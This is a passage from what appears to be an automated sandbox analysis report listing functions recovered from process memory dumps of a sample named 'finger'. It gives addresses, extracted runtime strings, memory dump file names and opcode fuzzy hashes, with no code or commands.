                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                              • Instruction ID: e4d12beaf6702569a057715d086c66316c60b022cf465df8a7f599d841dceebb
                                                              • Opcode Fuzzy Hash: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                              • Instruction Fuzzy Hash: 3A4102357247039FD724CE29C840BAAB7E5EF89750F040A2DF95ADB680DB71E485CB91
                                                              Function 032BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032F728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 032F72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032F7294
                                                              • RTL: Re-Waiting, xrefs: 032F72C1
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                              • Instruction ID: 7226b7e9b6c73ea47a823989dd11242f212c42bb4f3433d4ecceb7bf7599888e
                                                              • Opcode Fuzzy Hash: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                              • Instruction Fuzzy Hash: 5041D035620306AFD720DE29CC91FAAF7B5FF44750F140629F955AB280DB71E89287D1
                                                              Function 03332300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 6e119f02b3b8316c579bb91619577184636755d1e15f1d3e8b465b06eec892a3
                                                              • Instruction ID: de312e328103f5f9407b818afe46f050b1b5981d38960080096c839f416070b4
                                                              • Opcode Fuzzy Hash: 6e119f02b3b8316c579bb91619577184636755d1e15f1d3e8b465b06eec892a3
                                                              • Instruction Fuzzy Hash: 29317876A102199FCB20DF29DC80BEFB7F8FF45610F444559E849E7240EB30AA448FA1
                                                              Function 032C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: e433928fb85c575db7e46b6696d397f4e021218ed7b05b832585b09b1fae339b
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 5F91A071E3029A9EDB24DE6DC8906BEB7A5BF44320F18875EE865A72C0D77089C18F50
                                                              Function 03289126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                              • Instruction ID: e92c06eeea0575e571cff4ecb5fedd3fe6d3ee8e4ee0d54ef06be1877df612c0
                                                              • Opcode Fuzzy Hash: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                              • Instruction Fuzzy Hash: 07814875D10269DBDB31DB54CC45BEEB7B8AB08710F0445EAA91AB7280E7709EC0CFA0
                                                              Function 0330CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0330CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4rw@4rw
                                                              • API String ID: 4062629308-2979693914
                                                              • Opcode ID: c2d3c5d0c1f30a09353a0ddf90f3617fafd1b858dbb182a6e5b6fcee9846e3d2
                                                              • Instruction ID: f778774306bad9aa33554bb522b4ff904cb842ee54ab350394e5eff7fcfb83ad
                                                              • Opcode Fuzzy Hash: c2d3c5d0c1f30a09353a0ddf90f3617fafd1b858dbb182a6e5b6fcee9846e3d2
                                                              • Instruction Fuzzy Hash: C141B1B5910318DFDB21DF95C990AAEBBF8EF44710F04412AE914DF294D778C881CB91
                                                              Function 035A3EB3 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$0$@$@
                                                              • API String ID: 0-1132210376
                                                              • Opcode ID: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                              • Instruction ID: 5c999a283d54bd1f1759cc315168fbbd56b7f78486b1ca0eb62f54454ca48b95
                                                              • Opcode Fuzzy Hash: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                              • Instruction Fuzzy Hash: C751B170628B488FCB18CF68D8856DEBBF4FB89714F10055EE88A93251C734E645CB86